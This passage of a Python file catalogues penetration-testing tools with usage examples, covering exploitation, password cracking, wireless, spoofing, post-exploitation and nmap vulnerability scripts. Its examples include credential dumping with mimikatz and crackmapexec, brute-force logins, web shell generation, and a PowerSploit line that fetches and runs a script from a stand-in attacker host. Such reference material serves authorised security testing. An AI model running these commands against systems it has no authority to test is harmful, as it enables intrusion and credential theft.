            "-j": "JSON output", "--cve": "Search by CVE", "-e": "Exact match",
        },
        notes="Exploits at /usr/share/exploitdb/exploits/. Use -m to copy locally.",
    ),
    ToolInfo(
        name="crackmapexec",
        category="exploitation",
        description="Network service exploitation tool (SMB, SSH, WinRM, LDAP, etc.)",
        install_path="/usr/bin/crackmapexec",
        binary="crackmapexec",
        usage="crackmapexec <proto> <target> [options]",
        examples=[
            "crackmapexec smb 192.168.1.0/24 -u admin -p password --shares",
            "crackmapexec smb 192.168.1.0/24 -u admin -p password --sam",
            "crackmapexec ssh 192.168.1.0/24 -u root -p toor --ls",
            "crackmapexec winrm 192.168.1.0/24 -u admin -p password -x 'whoami'",
            "crackmapexec ldap 192.168.1.1 -u user -p pass --users --groups",
        ],
        flags={
            "-u": "Username", "-p": "Password", "--shares": "Enumerate shares",
            "--sam": "Dump SAM", "--lsa": "Dump LSA", "--ntds": "Dump NTDS",
            "-x": "Execute command", "-X": "PowerShell", "--mimikatz": "Run mimikatz",
        },
        notes="Like metasploit for network services.",
    ),
    ToolInfo(
        name="evil-winrm",
        category="exploitation",
        description="WinRM shell for Windows (PowerShell, uploads, downloads)",
        install_path="/usr/bin/evil-winrm",
        binary="evil-winrm",
        usage="evil-winrm -i <ip> -u <user> -p <password>",
        examples=[
            "evil-winrm -i 192.168.1.1 -u admin -p password",
            "evil-winrm -i 192.168.1.1 -u admin -p password -s scripts/ -e exes/",
        ],
        flags={
            "-i": "IP address", "-u": "Username", "-p": "Password", "-H": "NTLM hash",
            "-s": "Scripts folder", "-e": "Executables folder", "-c": "Command", "-k": "Kerberos",
        },
        notes="Requires WinRM service on target (port 5985/5986).",
    ),
    ToolInfo(
        name="pwntools",
        category="exploitation",
        description="CTF framework and exploit development library (Python)",
        install_path="/usr/lib/python3/dist-packages/pwnlib/",
        binary="pwn",
        usage="from pwn import *",
        examples=["pwn template ./binary > exploit.py"],
        flags={},
        depends_on=["python3"],
        notes="Python library for exploit development.",
    ),
    ToolInfo(
        name="ropper",
        category="exploitation",
        description="ROP/JOP/SYS gadget finder",
        install_path="/usr/bin/ropper",
        binary="ropper",
        usage="ropper [options]",
        examples=["ropper -f binary", "ropper -f binary --search 'pop rdi'"],
        flags={"-f": "File", "--search": "Search for gadgets"},
    ),
    ToolInfo(
        name="checksec",
        category="exploitation",
        description="Binary security checker (NX, ASLR, PIE, RELRO, canary)",
        install_path="/usr/bin/checksec",
        binary="checksec",
        usage="checksec --file=<binary>",
        examples=["checksec --file=binary"],
        flags={"--file": "Binary file"},
        notes="Shows which protections are enabled.",
    ),
    ToolInfo(
        name="file",
        category="exploitation",
        description="Determine file type",
        install_path="/usr/bin/file",
        binary="file",
        usage="file [options] <file>",
        examples=["file binary", "file --mime-type binary"],
        flags={"-b": "Brief", "--mime-type": "MIME type"},
    ),
    ToolInfo(
        name="objdump",
        category="exploitation",
        description="Object file information display",
        install_path="/usr/bin/objdump",
        binary="objdump",
        usage="objdump [options] <file>",
        examples=["objdump -d binary", "objdump -M intel -d binary"],
        flags={"-d": "Disassemble", "-x": "All headers", "-M": "Style (intel, att)", "-t": "Symbol table"},
    ),
    ToolInfo(
        name="strings",
        category="exploitation",
        description="Find printable strings in files",
        install_path="/usr/bin/strings",
        binary="strings",
        usage="strings [options] <file>",
        examples=["strings binary", "strings -n 6 binary", "strings -n 8 binary | grep -i pass"],
        flags={"-n": "Min length", "-e": "Encoding (l=16bit, L=32bit)", "-t": "Output format"},
    ),
    ToolInfo(
        name="nm",
        category="exploitation",
        description="List symbols from object files",
        install_path="/usr/bin/nm",
        binary="nm",
        usage="nm [options] <file>",
        examples=["nm binary", "nm -C binary"],
        flags={"-n": "Sort numerically", "-C": "Demangle C++", "-D": "Dynamic symbols"},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# PASSWORD ATTACK TOOLS
# ═══════════════════════════════════════════════════════════════════════════

PASSWORD_TOOLS = [
    ToolInfo(
        name="hashcat",
        category="password",
        description="Advanced password recovery utility (GPU-accelerated)",
        install_path="/usr/bin/hashcat",
        binary="hashcat",
        usage="hashcat [options] <hash> <wordlist>",
        examples=[
            "hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt",
            "hashcat -m 1000 hash.txt -a 3 ?a?a?a?a?a?a",
            "hashcat --show -m 0 hash.txt",
            "hashcat -m 1800 hash.txt rockyou.txt -r rules/best64.rule",
        ],
        flags={
            "-m": "Hash type (0=MD5, 1000=NTLM, 3200=bcrypt, 1800=sha512crypt)",
            "-a": "Attack mode (0=straight, 3=brute, 6=hybrid)",
            "--show": "Show cracked", "-o": "Output", "-w": "Workload (1-4)", "-r": "Rule file",
        },
        notes="Common modes: 0=MD5, 1000=NTLM, 1400=SHA256, 1800=sha512crypt, 3200=bcrypt, 5600=NetNTLMv2, 22000=WPA-PBKDF2",
    ),
    ToolInfo(
        name="john",
        category="password",
        description="John the Ripper password cracker",
        install_path="/usr/bin/john",
        binary="john",
        usage="john [options] <hashfile>",
        examples=[
            "john hash.txt",
            "john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt",
            "john --show hash.txt",
            "john --list=formats",
        ],
        flags={
            "--wordlist": "Wordlist mode", "--show": "Show cracked", "--format": "Hash format",
            "--incremental": "Incremental mode", "--list=formats": "List formats", "--rules": "Enable rules",
        },
    ),
    ToolInfo(
        name="hydra",
        category="password",
        description="Fast network logon cracker (supports 50+ protocols)",
        install_path="/usr/bin/hydra",
        binary="hydra",
        usage="hydra [options] <target> <service>",
        examples=[
            "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1",
            "hydra -l admin -P passwords.txt target.com http-post-form '/login:user=^USER^&pass=^PASS^:F=incorrect'",
            "hydra -L users.txt -P passwords.txt ftp://target.com",
            "hydra -l admin -P passwords.txt target.com rdp",
        ],
        flags={
            "-l": "Login", "-L": "Login list", "-p": "Password", "-P": "Password list",
            "-t": "Threads (default 16)", "-v/-V": "Verbose", "-f/-F": "Stop on first",
            "-o": "Output", "-s": "Port", "-x": "Brute force (min:max:charset)",
        },
        notes="Protocols: ssh, ftp, http-post-form, smb, rdp, vnc, telnet, mysql, imap, pop3, smtp, snmp",
    ),
    ToolInfo(
        name="medusa",
        category="password",
        description="Fast, massively parallel network login brute-forcer",
        install_path="/usr/bin/medusa",
        binary="medusa",
        usage="medusa [options] -h <host> -u <user> -P <passfile>",
        examples=["medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh"],
        flags={"-h": "Host", "-u": "Username", "-U": "User file", "-P": "Pass file", "-M": "Module", "-t": "Threads"},
    ),
    ToolInfo(
        name="ncrack",
        category="password",
        description="Network authentication cracking tool",
        install_path="/usr/bin/ncrack",
        binary="ncrack",
        usage="ncrack [options] <target>",
        examples=["ncrack -p 22 --user admin -P passwords.txt 192.168.1.1"],
        flags={"-p": "Port", "--user": "Username", "-P": "Password file", "-T": "Parallel hosts"},
    ),
    ToolInfo(
        name="cewl",
        category="password",
        description="Custom wordlist generator from web scraping",
        install_path="/usr/bin/cewl",
        binary="cewl",
        usage="cewl [options] <url>",
        examples=["cewl https://example.com -w wordlist.txt", "cewl -d 3 -m 5 https://example.com -w wordlist.txt"],
        flags={"-d": "Depth", "-m": "Min word length", "-w": "Output", "-a": "Include emails"},
        notes="Generates wordlists from website content.",
    ),
    ToolInfo(
        name="crunch",
        category="password",
        description="Wordlist generator based on character sets",
        install_path="/usr/bin/crunch",
        binary="crunch",
        usage="crunch <min> <max> [charset] [options]",
        examples=["crunch 8 8 -t @@@@@@@@ -o wordlist.txt", "crunch 4 4 1234567890 -o numbers.txt"],
        flags={"-t": "Pattern (@=lower, ,=upper, %=numbers, ^=symbols)", "-o": "Output"},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# FORENSICS TOOLS
# ═══════════════════════════════════════════════════════════════════════════

FORENSICS_TOOLS = [
    ToolInfo(
        name="volatility3",
        category="forensics",
        description="Memory forensics framework (Windows, Linux, Mac)",
        install_path="/usr/bin/vol",
        binary="vol",
        usage="vol -f <memory_dump> <plugin>",
        examples=[
            "vol -f dump.raw windows.pslist",
            "vol -f dump.raw windows.netscan",
            "vol -f dump.raw windows.hashdump",
            "vol -f dump.raw windows.malfind",
            "vol -f dump.raw linux.pslist",
        ],
        flags={"-f": "Memory dump file", "-o": "Output directory", "-q": "Quiet"},
        notes="V3 uses: windows.*, linux.*, mac.*",
    ),
    ToolInfo(
        name="binwalk",
        category="forensics",
        description="Firmware analysis and extraction tool",
        install_path="/usr/bin/binwalk",
        binary="binwalk",
        usage="binwalk [options] <file>",
        examples=["binwalk firmware.bin", "binwalk -e firmware.bin", "binwalk -M firmware.bin"],
        flags={"-e": "Extract", "-M": "Recursive extraction", "-E": "Entropy analysis"},
    ),
    ToolInfo(
        name="yara",
        category="forensics",
        description="Pattern matching for malware identification",
        install_path="/usr/bin/yara",
        binary="yara",
        usage="yara [options] <rule_file> <target>",
        examples=["yara rules.yar malware.exe", "yara -r rules/ suspicious/"],
        flags={"-r": "Recursive", "-s": "Print strings", "-m": "Print metadata", "-w": "No warnings"},
    ),
    ToolInfo(
        name="foremost",
        category="forensics",
        description="File carving tool (recovers deleted files)",
        install_path="/usr/bin/foremost",
        binary="foremost",
        usage="foremost [options] -i <input>",
        examples=["foremost -i disk.img -o output/"],
        flags={"-i": "Input file", "-o": "Output directory", "-t": "File types", "-v": "Verbose"},
    ),
    ToolInfo(
        name="scalpel",
        category="forensics",
        description="Fast file carving tool",
        install_path="/usr/bin/scalpel",
        binary="scalpel",
        usage="scalpel [options] <image>",
        examples=["scalpel disk.img -o output/"],
        flags={"-o": "Output directory", "-c": "Config file"},
    ),
    ToolInfo(
        name="sleuthkit",
        category="forensics",
        description="Digital forensics toolkit (TSK) - filesystem analysis",
        install_path="/usr/bin/fls",
        binary="fls",
        usage="fls/icat/mmls [options] <image>",
        examples=["fls -r disk.img", "icat disk.img <inode>", "mmls disk.img", "tsk_recover disk.img output/"],
        flags={"-r": "Recursive", "-d": "Show deleted"},
        notes="Commands: fls, icat, mmls, tsk_recover, ffind, istat",
    ),
    ToolInfo(
        name="bulk_extractor",
        category="forensics",
        description="Extract useful information from disk images",
        install_path="/usr/bin/bulk_extractor",
        binary="bulk_extractor",
        usage="bulk_extractor [options] <image>",
        examples=["bulk_extractor disk.img -o output/"],
        flags={"-o": "Output directory", "-e": "Extract specific data type", "-j": "Threads"},
    ),
    ToolInfo(
        name="dc3dd",
        category="forensics",
        description="Enhanced dd with hashing and pattern generation",
        install_path="/usr/bin/dc3dd",
        binary="dc3dd",
        usage="dc3dd if=<input> of=<output> hash=sha256log=<log>",
        examples=["dc3dd if=/dev/sda of=disk.img hash=sha256log=hash.txt"],
        flags={"if": "Input", "of": "Output", "hash": "Hash algorithm"},
    ),
    ToolInfo(
        name="autopsy",
        category="forensics",
        description="Digital forensics platform (GUI and CLI)",
        install_path="/usr/bin/autopsy",
        binary="autopsy",
        usage="autopsy",
        examples=["autopsy"],
        flags={},
        notes="GUI-based. Use sleuth kit CLI for command-line.",
    ),
    ToolInfo(
        name="guymager",
        category="forensics",
        description="GUI forensic image acquisition tool",
        install_path="/usr/bin/guymager",
        binary="guymager",
        usage="guymager",
        examples=["guymager"],
        flags={},
        notes="GUI. Supports E01, raw, AFF formats.",
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# WIRELESS TOOLS
# ═══════════════════════════════════════════════════════════════════════════

WIRELESS_TOOLS = [
    ToolInfo(
        name="aircrack-ng",
        category="wireless",
        description="WiFi security auditing suite (capture, crack, deauth)",
        install_path="/usr/bin/aircrack-ng",
        binary="aircrack-ng",
        usage="aircrack-ng [options] <capture file>",
        examples=[
            "aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap",
            "airodump-ng wlan0mon",
            "aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon",
            "airmon-ng start wlan0",
        ],
        flags={"-w": "Wordlist", "-b": "BSSID", "-e": "ESSID"},
        notes="Suite: airmon-ng (monitor), airodump-ng (capture), aireplay-ng (inject), aircrack-ng (crack)",
    ),
    ToolInfo(
        name="wifite",
        category="wireless",
        description="Automated wireless attack tool",
        install_path="/usr/bin/wifite",
        binary="wifite",
        usage="wifite [options]",
        examples=["wifite", "wifite --wpa", "wifite -i wlan0mon --kill"],
        flags={"--wpa": "Target WPA only", "--wep": "Target WEP only", "-i": "Interface", "--kill": "Kill conflicting processes"},
    ),
    ToolInfo(
        name="kismet",
        category="wireless",
        description="Wireless network detector, sniffer, and IDS",
        install_path="/usr/bin/kismet",
        binary="kismet",
        usage="kismet [options]",
        examples=["kismet", "kismet -c wlan0mon"],
        flags={"-c": "Capture interface"},
        notes="GUI-based.",
    ),
    ToolInfo(
        name="reaver",
        category="wireless",
        description="WPS brute force attack tool",
        install_path="/usr/bin/reaver",
        binary="reaver",
        usage="reaver [options]",
        examples=["reaver -i wlan0mon -b AP_MAC -vv"],
        flags={"-i": "Interface", "-b": "BSSID", "-c": "Channel", "-vv": "Very verbose", "-r": "Sleep between attempts"},
    ),
    ToolInfo(
        name="bully",
        category="wireless",
        description="WPS brute force attack tool",
        install_path="/usr/bin/bully",
        binary="bully",
        usage="bully [options] <interface>",
        examples=["bully -b AP_MAC -c 6 wlan0mon"],
        flags={"-b": "BSSID", "-c": "Channel", "-v": "Verbose"},
    ),
    ToolInfo(
        name="fern-wifi-cracker",
        category="wireless",
        description="GUI WiFi security auditing tool",
        install_path="/usr/bin/fern-wifi-cracker",
        binary="fern-wifi-cracker",
        usage="fern-wifi-cracker",
        examples=["fern-wifi-cracker"],
        flags={},
        notes="GUI tool. Requires monitor mode adapter.",
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# REVERSE ENGINEERING TOOLS
# ═══════════════════════════════════════════════════════════════════════════

REVERSE_ENGINEERING_TOOLS = [
    ToolInfo(
        name="ghidra",
        category="reverse_engineering",
        description="Software reverse engineering framework (NSA)",
        install_path="/opt/ghidra/",
        binary="ghidra",
        usage="ghidra / analyzeHeadless [options]",
        examples=["ghidra &", "analyzeHeadless /tmp/project Project -import binary -postScript Script.java"],
        flags={},
        notes="GUI tool. Use analyzeHeadless for scripting.",
    ),
    ToolInfo(
        name="radare2",
        category="reverse_engineering",
        description="Reverse engineering framework (CLI-based)",
        install_path="/usr/bin/r2",
        binary="r2",
        usage="r2 [options] <file>",
        examples=["r2 -A binary", "r2 -q -c 'aaa;afl' binary", "r2 -A -c 'pdf @main' binary"],
        flags={"-A": "Analyze", "-q": "Quiet", "-c": "Command", "-w": "Write mode", "-d": "Debug mode"},
        notes="Commands: aaa=analyze, afl=functions, pdf=disasm, iz=strings, axt=xrefs",
    ),
    ToolInfo(
        name="gdb",
        category="reverse_engineering",
        description="GNU Debugger",
        install_path="/usr/bin/gdb",
        binary="gdb",
        usage="gdb [options] <program>",
        examples=["gdb ./binary", "gdb -q ./binary -ex 'b main' -ex 'r'"],
        flags={"-q": "Quiet", "-ex": "Execute command", "-batch": "Batch mode"},
        notes="Use with pwndbg or GEF for better UX.",
    ),
    ToolInfo(
        name="pwndbg",
        category="reverse_engineering",
        description="GDB plugin for exploit developers",
        install_path="/usr/bin/pwndbg",
        binary="pwndbg",
        usage="pwndbg [options] <program>",
        examples=["pwndbg ./binary"],
        flags={},
        notes="Enhanced GDB with: context, heap, bins, telescope, vmmap",
    ),
    ToolInfo(
        name="gef",
        category="reverse_engineering",
        description="GDB Enhanced Features",
        install_path="/usr/bin/gef",
        binary="gef",
        usage="gef [options] <program>",
        examples=["gef ./binary"],
        flags={},
        notes="Alternative to pwndbg. Commands: checksec, vmmap, heap, pattern create/search",
    ),
    ToolInfo(
        name="strace",
        category="reverse_engineering",
        description="System call tracer",
        install_path="/usr/bin/strace",
        binary="strace",
        usage="strace [options] <command>",
        examples=["strace ./binary", "strace -e trace=open,read,write ./binary", "strace -p <pid>"],
        flags={"-e": "Filter", "-f": "Follow forks", "-p": "PID", "-o": "Output", "-c": "Summary"},
    ),
    ToolInfo(
        name="ltrace",
        category="reverse_engineering",
        description="Library call tracer",
        install_path="/usr/bin/ltrace",
        binary="ltrace",
        usage="ltrace [options] <command>",
        examples=["ltrace ./binary", "ltrace -e malloc+free ./binary"],
        flags={"-e": "Filter", "-p": "PID", "-o": "Output"},
    ),
    ToolInfo(
        name="apktool",
        category="reverse_engineering",
        description="Android APK reverse engineering tool",
        install_path="/usr/bin/apktool",
        binary="apktool",
        usage="apktool [command] <file>",
        examples=["apktool d app.apk", "apktool b app/"],
        flags={"d": "Decode", "b": "Build", "if": "Install framework"},
    ),
    ToolInfo(
        name="jadx",
        category="reverse_engineering",
        description="Android DEX to Java source code decompiler",
        install_path="/usr/bin/jadx",
        binary="jadx",
        usage="jadx [options] <file>",
        examples=["jadx app.apk", "jadx -d output/ app.apk"],
        flags={"-d": "Output directory", "--show-bad-code": "Show problematic code"},
    ),
    ToolInfo(
        name="dex2jar",
        category="reverse_engineering",
        description="Convert Android DEX to JAR",
        install_path="/usr/bin/d2j-dex2jar",
        binary="d2j-dex2jar",
        usage="d2j-dex2jar [options] <file>",
        examples=["d2j-dex2jar app.apk -o app-dex2jar.jar"],
        flags={"-o": "Output file"},
    ),
    ToolInfo(
        name="flawfinder",
        category="reverse_engineering",
        description="C/C++ source code scanner for security flaws",
        install_path="/usr/bin/flawfinder",
        binary="flawfinder",
        usage="flawfinder [options] <file/directory>",
        examples=["flawfinder --columns --context ."],
        flags={"--columns": "Column numbers", "--context": "Context", "--sarif": "SARIF output"},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# SNIFFING & SPOOFING TOOLS
# ═══════════════════════════════════════════════════════════════════════════

SNIFFING_SPOOFING_TOOLS = [
    ToolInfo(
        name="ettercap",
        category="sniffing_spoofing",
        description="ARP spoofing, DNS spoofing, MITM attacks",
        install_path="/usr/bin/ettercap",
        binary="ettercap",
        usage="ettercap [options]",
        examples=["ettercap -T -q -i eth0 -M arp // //", "ettercap -T -q -i eth0 -P dns_spoof -M arp // //"],
        flags={"-T": "Text mode", "-G": "GUI", "-q": "Quiet", "-i": "Interface", "-M": "MITM (arp, icmp, dhcp)", "-P": "Plugin"},
        notes="Use -M arp for ARP poisoning.",
    ),
    ToolInfo(
        name="mitmproxy",
        category="sniffing_spoofing",
        description="Interactive HTTPS proxy and traffic interceptor",
        install_path="/usr/bin/mitmproxy",
        binary="mitmproxy",
        usage="mitmproxy [options]",
        examples=["mitmproxy", "mitmdump -s script.py"],
        flags={"-p": "Listen port", "-s": "Script", "--mode": "Mode (regular, transparent, socks5)"},
        notes="Configure browser proxy to 127.0.0.1:8080.",
    ),
    ToolInfo(
        name="arpspoof",
        category="sniffing_spoofing",
        description="ARP spoofing tool (dsniff package)",
        install_path="/usr/bin/arpspoof",
        binary="arpspoof",
        usage="arpspoof [options] <target>",
        examples=["arpspoof -i eth0 192.168.1.1", "arpspoof -i eth0 -t 192.168.1.100 192.168.1.1"],
        flags={"-i": "Interface", "-t": "Target", "-r": "Reverse"},
        notes="Enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward",
    ),
    ToolInfo(
        name="sslstrip",
        category="sniffing_spoofing",
        description="SSL/TLS stripping tool",
        install_path="/usr/bin/sslstrip",
        binary="sslstrip",
        usage="sslstrip [options]",
        examples=["sslstrip -l 8080"],
        flags={"-l": "Listen port"},
        notes="Less effective against HSTS.",
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# POST-EXPLOITATION TOOLS
# ═══════════════════════════════════════════════════════════════════════════

POST_EXPLOIT_TOOLS = [
    ToolInfo(
        name="linpeas",
        category="post_exploit",
        description="Linux Privilege Escalation Awesome Script",
        install_path="/usr/bin/linpeas",
        binary="linpeas.sh",
        usage="./linpeas.sh [options]",
        examples=["./linpeas.sh", "./linpeas.sh -a", "./linpeas.sh -s -o /tmp/linpeas.txt"],
        flags={"-a": "All checks", "-s": "Super fast", "-o": "Output", "-c": "Color", "-S": "Secure (skip noisy)"},
        notes="Most comprehensive Linux privesc checker.",
    ),
    ToolInfo(
        name="linenum",
        category="post_exploit",
        description="Linux enumeration script",
        install_path="/usr/bin/linenum",
        binary="linenum.sh",
        usage="./linenum.sh [options]",
        examples=["./linenum.sh -t", "./linenum.sh -t -e /tmp/linenum.txt"],
        flags={"-t": "Thorough", "-e": "Export report"},
    ),
    ToolInfo(
        name="linux-exploit-suggester",
        category="post_exploit",
        description="Linux privilege escalation auditing (checks for kernel exploits)",
        install_path="/usr/bin/linux-exploit-suggester",
        binary="linux-exploit-suggester.sh",
        usage="./linux-exploit-suggester.sh [options]",
        examples=["./linux-exploit-suggester.sh", "./linux-exploit-suggester.sh --checksec"],
        flags={"--checksec": "Check kernel security features"},
    ),
    ToolInfo(
        name="unix-privesc-check",
        category="post_exploit",
        description="Unix privilege checking script",
        install_path="/usr/bin/unix-privesc-check",
        binary="unix-privesc-check",
        usage="unix-privesc-check [standard|detailed]",
        examples=["unix-privesc-check standard"],
        flags={},
    ),
    ToolInfo(
        name="mimikatz",
        category="post_exploit",
        description="Windows credential extraction (plaintext, hashes, Kerberos)",
        install_path="/usr/bin/mimikatz",
        binary="mimikatz",
        usage="mimikatz [options]",
        examples=["mimikatz # privilege::debug", "mimikatz # sekurlsa::logonpasswords"],
        flags={},
        notes="Run as Administrator. Key commands: privilege::debug, sekurlsa::logonpasswords, lsadump::sam",
    ),
    ToolInfo(
        name="powersploit",
        category="post_exploit",
        description="PowerShell post-exploitation framework",
        install_path="/usr/share/powersploit/",
        binary="PowerSploit",
        usage="Import-Module ./<module>.ps1",
        examples=["IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/Invoke-Mimikatz.ps1')"],
        flags={},
        notes="Modules: Reconnaissance, Persistence, PrivEsc, Exfiltration, Execution",
    ),
    ToolInfo(
        name="empire",
        category="post_exploit",
        description="PowerShell and Python post-exploitation framework",
        install_path="/usr/bin/empire",
        binary="empire",
        usage="empire [options]",
        examples=["empire", "empire --rest"],
        flags={"--rest": "RESTful API"},
    ),
    ToolInfo(
        name="weevely",
        category="post_exploit",
        description="Web shell management tool",
        install_path="/usr/bin/weevely",
        binary="weevely",
        usage="weevely [options] <url> <password>",
        examples=["weevely generate password shell.php", "weevely http://target.com/shell.php password"],
        flags={},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# STEGANOGRAPHY TOOLS
# ═══════════════════════════════════════════════════════════════════════════

STEGANOGRAPHY_TOOLS = [
    ToolInfo(
        name="steghide",
        category="steganography",
        description="Steganography tool (JPEG, BMP, WAV, AU)",
        install_path="/usr/bin/steghide",
        binary="steghide",
        usage="steghide [options] <file>",
        examples=[
            "steghide embed -cf image.jpg -ef secret.txt",
            "steghide extract -sf image.jpg",
            "steghide info image.jpg",
        ],
        flags={"embed": "Embed", "extract": "Extract", "info": "Info", "-cf": "Cover file", "-ef": "Embed file", "-sf": "Stego file", "-p": "Passphrase"},
    ),
    ToolInfo(
        name="stegseek",
        category="steganography",
        description="Fast steghide cracker",
        install_path="/usr/bin/stegseek",
        binary="stegseek",
        usage="stegseek [options] <stego file>",
        examples=["stegseek image.jpg", "stegseek image.jpg wordlist.txt"],
        flags={"-sf": "Stego file", "-xf": "Extract file", "--force": "Force"},
        notes="Faster than steghide cracker.",
    ),
    ToolInfo(
        name="zsteg",
        category="steganography",
        description="PNG/BMP steganography analyzer",
        install_path="/usr/bin/zsteg",
        binary="zsteg",
        usage="zsteg [options] <file>",
        examples=["zsteg image.png", "zsteg -a image.png"],
        flags={"-a": "Check all methods", "-E": "Extraction method"},
    ),
    ToolInfo(
        name="stegoveritas",
        category="steganography",
        description="Steganography analysis tool (automated checks)",
        install_path="/usr/bin/stegoveritas",
        binary="stegoveritas",
        usage="stegoveritas [options] <file>",
        examples=["stegoveritas image.png", "stegoveritas -meta image.png"],
        flags={"-meta": "Metadata only", "-extractLSB": "Extract LSB"},
    ),
    ToolInfo(
        name="exiftool",
        category="steganography",
        description="EXIF/metadata reader and writer",
        install_path="/usr/bin/exiftool",
        binary="exiftool",
        usage="exiftool [options] <file>",
        examples=["exiftool image.jpg", "exiftool -Comment image.jpg"],
        flags={"-AllDates": "All dates", "-Comment": "Comment tag", "-g": "Group names", "-s": "Short format"},
        notes="Metadata often contains hidden info. Check GPS, comments, author.",
    ),
    ToolInfo(
        name="pngcheck",
        category="steganography",
        description="PNG file validator and analyzer",
        install_path="/usr/bin/pngcheck",
        binary="pngcheck",
        usage="pngcheck [options] <file>",
        examples=["pngcheck image.png", "pngcheck -cvt image.png"],
        flags={"-c": "Check", "-v": "Verbose", "-t": "Text chunks"},
    ),
]

# ═══════════════════════════════════════════════════════════════════════════
# NSE SCRIPT CATEGORIES
# ═══════════════════════════════════════════════════════════════════════════

NSE_SCRIPTS = [
    # Vulnerability Detection
    NSEScript("vuln", "vulnerability", "Run all vulnerability detection scripts", "--script=vuln", "nmap --script vuln target"),
    NSEScript("http-vuln-cve2021-44228", "vulnerability", "Log4Shell (CVE-2021-44228)", "--script=http-vuln-cve2021-44228", "nmap --script http-vuln-cve2021-44228 -p 8080 target"),
    NSEScript("smb-vuln-ms17-010", "vulnerability", "EternalBlue (MS17-010)", "--script=smb-vuln-ms17-010", "nmap --script smb-vuln-ms17-010 -p 445 target"),
    NSEScript("smb-vuln-ms08-067", "vulnerability", "MS08-067", "--script=smb-vuln-ms08-067", "nmap --script smb-vuln-ms08-067 -p 445 target"),
    NSEScript("ssl-heartbleed", "vulnerability", "Heartbleed (CVE-2014-0160)", "--script=ssl-heartbleed", "nmap --script ssl-heartbleed -p 443 target"),
    NSEScript("ssl-poodle", "vulnerability", "POODLE (CVE-2014-3566)", "--script=ssl-poodle", "nmap --script ssl-poodle -p 443 target"),
    NSEScript("ssl-ccs-injection", "vulnerability", "CCS Injection (CVE-2014-0224)", "--script=ssl-ccs-injection", "nmap --script ssl-ccs-injection -p 443 target"),
    NSEScript("ssl-cert", "discovery", "SSL certificate information", "--script=ssl-cert", "nmap --script ssl-cert -p 443 target"),
    NSEScript("http-shellshock", "vulnerability", "Shellshock (CVE-2014-6271)", "--script=http-shellshock", "nmap --script http-shellshock --script-args uri=/cgi-bin/test.cgi -p 80 target"),
    NSEScript("smb-os-discovery", "discovery", "OS detection via SMB", "--script=smb-os-discovery", "nmap --script smb-os-discovery -p 445 target"),
    NSEScript("smb-enum-shares", "discovery", "Enumerate SMB shares", "--script=smb-enum-shares", "nmap --script smb-enum-shares -p 445 target"),
    NSEScript("smb-enum-users", "discovery", "Enumerate SMB users", "--script=smb-enum-users", "nmap --script smb-enum-users -p 445 target"),
    NSEScript("http-enum", "discovery", "Enumerate web directories/files", "--script=http-enum", "nmap --script http-enum -p 80 target"),
    NSEScript("http-headers", "discovery", "Check HTTP headers", "--script=http-headers", "nmap --script http-headers -p 80 target"),
    NSEScript("http-methods", "discovery", "Enumerate HTTP methods", "--script=http-methods", "nmap --script http-methods -p 80 target"),
    NSEScript("http-title", "discovery", "Get HTTP page title", "--script=http-title", "nmap --script http-title -p 80 target"),
    NSEScript("http-robots.txt", "discovery", "Check robots.txt", "--script=http-robots.txt", "nmap --script http-robots.txt -p 80 target"),
    NSEScript("http-sitemap-generator", "discovery", "Generate sitemap", "--script=http-sitemap-generator", "nmap --script http-sitemap-generator -p 80 target"),
    NSEScript("http-wordpress-enum", "discovery", "Enumerate WordPress", "--script=http-wordpress-enum", "nmap --script http-wordpress-enum -p 80 target"),
    NSEScript("http-joomla-brute", "brute", "Joomla brute force", "--script=http-joomla-brute", "nmap --script http-joomla-brute --script-args http-joomla-brute.userdb=users.txt,http-joomla-brute.passdb=pass.txt -p 80 target"),
    NSEScript("http-brute", "brute", "HTTP basic auth brute force", "--script=http-brute", "nmap --script http-brute -p 80 target"),
    NSEScript("ssh-brute", "brute", "SSH brute force", "--script=ssh-brute", "nmap --script ssh-brute -p 22 target"),
    NSEScript("ssh-auth-methods", "discovery", "Enumerate SSH auth methods", "--script=ssh-auth-methods", "nmap --script ssh-auth-methods -p 22 target"),
    NSEScript("ftp-anon", "discovery", "Check anonymous FTP", "--script=ftp-anon", "nmap --script ftp-anon -p 21 target"),
    NSEScript("ftp-brute", "brute", "FTP brute force", "--script=ftp-brute", "nmap --script ftp-brute -p 21 target"),
    NSEScript("mysql-info", "discovery", "MySQL server info", "--script=mysql-info", "nmap --script mysql-info -p 3306 target"),
    NSEScript("mysql-brute", "brute", "MySQL brute force", "--script=mysql-brute", "nmap --script mysql-brute -p 3306 target"),
    NSEScript("snmp-brute", "brute", "SNMP community string brute force", "--script=snmp-brute", "nmap -sU -p 161 --script snmp-brute target"),
    NSEScript("snmp-info", "discovery", "SNMP information", "--script=snmp-info", "nmap -sU -p 161 --script snmp-info target"),
    NSEScript("ssl-enum-ciphers", "discovery", "Enumerate SSL/TLS ciphers", "--script=ssl-enum-ciphers", "nmap --script ssl-enum-ciphers -p 443 target"),
    NSEScript("broadcast-ping", "discovery", "Broadcast ping discovery", "--script=broadcast-ping", "nmap -sn --script broadcast-ping 192.168.1.0/24"),
    NSEScript("broadcast-arp", "discovery", "ARP broadcast discovery", "--script=broadcast-arp", "nmap -sn --script broadcast-arp 192.168.1.0/24"),
    NSEScript("broadcast-dns-service-discovery", "discovery", "DNS service discovery", "--script=broadcast-dns-service-discovery", "nmap --script broadcast-dns-service-discovery 192.168.1.0/24"),
]

# ═══════════════════════════════════════════════════════════════════════════
# METASPLOIT MODULES (Common)
# ═══════════════════════════════════════════════════════════════════════════

METASPLOIT_MODULES = [
    # Listeners
    MetasploitModule("multi/handler", "exploit/multi/handler", "Generic payload handler", "multi", {"PAYLOAD": "Payload to use", "LHOST": "Attacker IP", "LPORT": "Attacker port"}, "any"),
    # Windows Exploits
